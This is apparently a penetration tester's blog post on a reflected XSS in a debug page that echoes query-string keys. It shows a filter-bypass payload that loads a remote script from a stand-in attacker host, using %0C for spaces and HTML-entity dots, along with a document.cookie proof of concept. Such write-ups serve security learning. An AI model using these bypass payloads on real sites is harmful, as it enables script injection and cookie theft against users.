A recent site that I pentested was echoing everything on the query string and POST data into a <div> tag.

e.g. example.php?monkey=banana gave

monkey => banana

I’m guessing this was for debugging reasons. So an easy XSS with

example.php?<script>alert(1)</script> gave


So I thought rather than just echoing 1 or xss I’d output the current cookie as a simple POC.

However, things weren’t as they seemed:

example.php?<script>alert(document.cookie)</script> gave


Underscore!? Oh well, I’ll just use an accessor to access the property:

example.php?<script>alert(document['cookie'])</script>. Nope:


So thought the answer was to host the script on a remote domain:

example.php?<script src="//attacker-site.co.uk/sc.js"></script>:


Doh! Two problems….

A quick Google gave the answer to use %0C for the space:


And then to get the dots, we can simply HTML encode them as we are in an HTML context:


which percent encoded is of course


And this delivered the goods:

<script src="//attacker-site&#46;co&#46;uk/sc&#46;js"></script>

which the browser reads as

<script src="//attacker-site.co.uk/sc.js"></script>

And dutifully delivers our message box: